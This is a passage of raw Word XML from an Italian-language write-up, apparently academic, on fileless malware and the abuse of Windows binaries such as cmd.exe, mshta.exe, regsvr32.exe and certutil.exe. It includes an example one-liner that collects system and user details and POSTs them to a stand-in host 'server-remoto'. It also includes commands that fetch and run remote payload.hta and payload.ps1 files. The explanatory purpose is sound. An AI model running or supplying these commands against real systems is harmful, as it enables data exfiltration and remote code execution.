      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>('http://server-remoto/payload.ps1')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3207C245" w14:textId="77777777" w:rsidR="00A82548" w:rsidRDefault="00A82548" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64261ABB" w14:textId="77777777" w:rsidR="00A82548" w:rsidRPr="00A82548" w:rsidRDefault="00A82548" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: Viene utilizzato come interprete di comandi per avviare istruzioni concatenate tramite il parametro /c. Questo consente di eseguire una sequenza compatta di operazioni, come l’esfiltrazione di dati personali, il </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>download</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> di payload, la sua esecuzione e la successiva eliminazione di eventuali tracce. La capacità di concatenare comandi e terminare immediatamente il processo contribuisce all’occultamento dell’attività malevola.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF4854" w14:textId="77777777" w:rsidR="00B3023D" w:rsidRDefault="00A82548" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Esempio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E63755" w14:textId="1EC6EF19" w:rsidR="00A82548" w:rsidRPr="00A82548" w:rsidRDefault="00A82548" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>cmd.exe /c "(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; net user) &gt; %TEMP%\info.txt &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Invoke-WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Uri 'http://server-remoto/upload' -Method Post -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>InFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> '%TEMP%\info.txt'" &amp; del %TEMP%\info.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50522A38" w14:textId="77777777" w:rsidR="00A82548" w:rsidRPr="00A82548" w:rsidRDefault="001A1FCA" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mshta.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Gestisce le HTML Applications (.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">) e permette l’esecuzione di codice JavaScript o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>VBScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> da riga di comando o da URL remoto. Se richiamato tramite una chiave di registro, può eseguire uno script ospitato su un server esterno senza creare file locali, aggirando in alcuni casi i controlli di sicurezza del browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42229651" w14:textId="77777777" w:rsidR="00B3023D" w:rsidRDefault="00B951B4" w:rsidP="00B3023D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360" w:firstLine="348"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Esempio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67060F8D" w14:textId="2997DDBE" w:rsidR="00A82548" w:rsidRDefault="00B951B4" w:rsidP="00B3023D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360" w:firstLine="348"/>
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve">mshta.exe   </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00A82548" w:rsidRPr="001952C4">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:highlight w:val="black"/>
          </w:rPr>
          <w:t>http://server-remoto/payload.hta</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5AA2C560" w14:textId="77777777" w:rsidR="00A82548" w:rsidRDefault="00A82548" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2419E139" w14:textId="69B89D45" w:rsidR="001A1FCA" w:rsidRPr="00A82548" w:rsidRDefault="00B951B4" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00A82548">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>regsvr32.exe</w:t>
      </w:r>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: Strumento destinato alla registrazione delle DLL, può essere abusato per scaricare ed eseguire script remoti direttamente in memoria. Essendo un binario Microsoft firmato, il suo utilizzo può eludere sistemi di controllo basati su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>whitelist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> applicative, rendendo l’attività meno sospetta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE21736" w14:textId="4F6E387D" w:rsidR="001A1FCA" w:rsidRPr="00B3023D" w:rsidRDefault="00B951B4" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00A82548">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>undll32.exe</w:t>
      </w:r>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: È progettato per caricare ed eseguire funzioni contenute in librerie dinamiche. I malware fileless lo sfruttano per richiamare DLL di sistema e forzarle a </w:t>
      </w:r>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>interpretare codice malevolo come se fosse una funzione legittima, mascherando l’esecuzione all’interno di un processo affidabile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F292B1E" w14:textId="5942A8A8" w:rsidR="00A82548" w:rsidRPr="00B3023D" w:rsidRDefault="00BA07F1" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00B3023D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ertutil.exe</w:t>
      </w:r>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00B3023D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Utile per la gestione dei certificati digitali, potrebbe essere utilizzato come strumento di download o di decodifica. Può prelevare contenuti da server remoti oppure convertire stringhe codificate in Base64 memorizzate nel Registro in payload eseguibili, contribuendo alla strategia di attacco senza generare file evidenti sul disco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AA602C" w14:textId="77777777" w:rsidR="00A82548" w:rsidRPr="001A1FCA" w:rsidRDefault="00A82548" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00BE97F8" w14:textId="77777777" w:rsidR="004C1E3B" w:rsidRPr="00E97BB0" w:rsidRDefault="004C1E3B" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:id w:val="-303469538"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="374D1145" w14:textId="02FB1F87" w:rsidR="004C1E3B" w:rsidRPr="00E97BB0" w:rsidRDefault="004C1E3B" w:rsidP="00A82548">
          <w:pPr>
            <w:pStyle w:val="Titolo1"/>
            <w:rPr>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00E97BB0">
            <w:rPr>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
            <w:t>Bibliografia</w:t>
          </w:r>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
            <w:id w:val="111145805"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtContent>
            <w:p w14:paraId="2627C1D3" w14:textId="77777777" w:rsidR="0041086B" w:rsidRPr="00E97BB0" w:rsidRDefault="004C1E3B" w:rsidP="00A82548">
              <w:pPr>
                <w:pStyle w:val="Bibliografia"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                  <w14:ligatures w14:val="none"/>
                </w:rPr>
              </w:pPr>
              <w:r w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                </w:rPr>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                </w:rPr>
                <w:instrText>BIBLIOGRAPHY</w:instrText>
              </w:r>
              <w:r w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="0041086B" w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:noProof/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                </w:rPr>
                <w:t xml:space="preserve">Microsoft. (2025, Gennaio 15). </w:t>
              </w:r>
              <w:r w:rsidR="0041086B" w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                </w:rPr>
                <w:t>Informazioni sul Registro di sistema di Windows per gli utenti esperti</w:t>
              </w:r>
              <w:r w:rsidR="0041086B" w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:noProof/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                </w:rPr>
                <w:t>. Tratto da Microsoft Learn: https://learn.microsoft.com/it-it/troubleshoot/windows-server/performance/windows-registry-advanced-users</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="5E4379D7" w14:textId="77777777" w:rsidR="0041086B" w:rsidRPr="00E97BB0" w:rsidRDefault="0041086B" w:rsidP="00A82548">
              <w:pPr>
                <w:pStyle w:val="Bibliografia"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
              </w:pPr>
              <w:r w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:noProof/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve">Springer Nature. (2020). An emerging threat Fileless malware: a survey and research challenges. </w:t>
              </w:r>
              <w:r w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Springer Nature Link</w:t>
              </w:r>
              <w:r w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:noProof/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>. Retrieved from https://link.springer.com/article/10.1186/s42400-019-0043-x</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="4F4F581B" w14:textId="067A9828" w:rsidR="00A50725" w:rsidRPr="00E97BB0" w:rsidRDefault="004C1E3B" w:rsidP="00A82548">
              <w:pPr>
                <w:rPr>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                </w:rPr>
              </w:pPr>
              <w:r w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:sectPr w:rsidR="00A50725" w:rsidRPr="00E97BB0">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67106"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="820C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1080C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC8A8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72111C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0044A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796B7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C2A0FA8"/>
    <w:lvl w:ilvl="0" w:tplc="0410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3762685E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5456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2C586D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="445E34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495812"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1F24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F0156F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1390FD7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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="48147DBA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59F8F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826219"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="23F60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CA3A0D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA143F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561B161F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A645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CB57B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3DAB19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6267650E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1486B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86A7968"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF64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5E02A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B76F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DF7FB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70841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EC6A36"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C88B57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7168611A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E1808E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76AF5C5E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3FAAE8C2"/>
    <w:lvl w:ilvl="0" w:tplc="D1042C56">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1068" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:r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20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="772F064C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B224C640"/>
    <w:lvl w:ilvl="0" w:tplc="17D6AB90">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="000000" w:themeColor="text1"/>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num w:numId="1" w16cid:durableId="405763203">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="62338613">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="993728766">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="761143267">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340402470">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="840893291">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1137642995">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1901280077">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1505129166">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1966766617">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1079909917">
    <w:abstractNumId w:val="13"/>
  </w:num>
